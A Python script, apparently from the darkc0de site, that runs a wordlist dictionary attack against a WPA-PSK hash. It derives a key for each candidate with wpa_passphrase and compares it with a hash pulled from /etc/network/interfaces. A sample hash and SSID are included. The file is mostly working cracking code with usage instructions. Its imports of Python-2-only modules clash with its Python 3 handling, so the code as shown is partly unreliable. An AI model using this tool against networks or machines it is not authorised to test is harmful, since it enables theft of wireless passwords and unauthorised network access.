Python script that cracks a 256-bit WPA-PSK hash (64 char) using wpa_passphrase and a wordlist.
64f83af457754e31a3d03e207fb755e633bab664fab632e28121f6d198cb0ca0
#!/usr/bin/python
#Cracks a 256-bit WPA-PSK hash (64 char) using wpa_passphrase
#and a wordlist.
#This uses the linux tool wpa_passphrase to generate a 256-bit PSK.
#Make sure you have this tool prior to using this cracker.
#d3hydr8@linuxbox:~$ man wpa_passphrase
#d3hydr8@linuxbox:~$ wpa_passphrase <ssid> <passphrase>
#Check the /etc/network/interfaces file for this hash. It will look something like this.
#auto lo
#iface lo inet loopback
#iface eth1 inet dhcp
#wpa-psk 11f3833adac3ed17ad05031c18170597ae0f911eed618927513c5d40a800b9d8
#wpa-driver wext
#wpa-key-mgmt WPA-PSK
#wpa-proto WPA
#wpa-ssid darkc0de
#auto eth1
#Hash: 11f3833adac3ed17ad05031c18170597ae0f911eed618927513c5d40a800b9d8
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import commands
import getopt
import md5
import re
import StringIO
import subprocess
import sys
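def gethash(word):
    """Return the 64-hex-digit PSK that wpa_passphrase derives for *word*.

    The SSID is read from sys.argv[2]. The SSID and the candidate are handed
    to wpa_passphrase as separate argv entries with no shell in between, so
    spaces, quotes, ``;`` or ``$(...)`` in a wordlist line or in the SSID are
    treated as data. Building the command as one string and running it
    through a shell would let such a line run arbitrary commands as the
    invoking user.

    Returns None when the tool's output holds no 64-character lowercase hex
    string (for example when it rejects the passphrase) or when the tool
    cannot be started.
    """
    argv = ["wpa_passphrase", sys.argv[2], word]
    try:
        # stderr is folded into stdout so the scanned text is the same
        # combined output the shell-based call used to capture.
        proc = subprocess.Popen(argv, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
    except OSError:
        # Tool missing or not executable: no hash can be produced, which is
        # the same "no result" outcome callers already handle.
        return None
    out = proc.communicate()[0]
    if not isinstance(out, str):
        # Python 3 hands back bytes; the pattern below is a text pattern.
        out = out.decode("utf-8", "replace")
    found = re.search("[a-f0-9]{64}", out)
    if found:
        return found.group(0)
    return None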
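# Command-line entry point: <hash> <ssid> <wordlist>.
if len(sys.argv) != 4:
    print("Usage: ./wpacrack.py <hash> <ssid> <wordlist>")
    sys.exit(1)

# A WPA PSK is 256 bits, i.e. 64 hex characters.
if len(sys.argv[1]) != 64:
    print("\nError: Hash length incorrect (64 char)\n")
    sys.exit(1)

try:
    # The context manager closes the wordlist handle, which was previously
    # left open for the lifetime of the process.
    with open(sys.argv[3], "r") as wordlist:
        words = wordlist.readlines()
except IOError:
    print("\nError: Check your wordlist path\n")
    sys.exit(1)

print("\n%d words loaded..." % len(words))

for line in words:
    # Strip only the line terminator (LF or CRLF) so a trailing "\r" from a
    # Windows-format wordlist does not become part of the candidate.
    candidate = line.rstrip("\r\n")
    if gethash(candidate) == sys.argv[1]:
        # Report the stripped candidate (no stray newline) and stop: later
        # lines cannot change the result.
        print("Password is: %s" % candidate)
        break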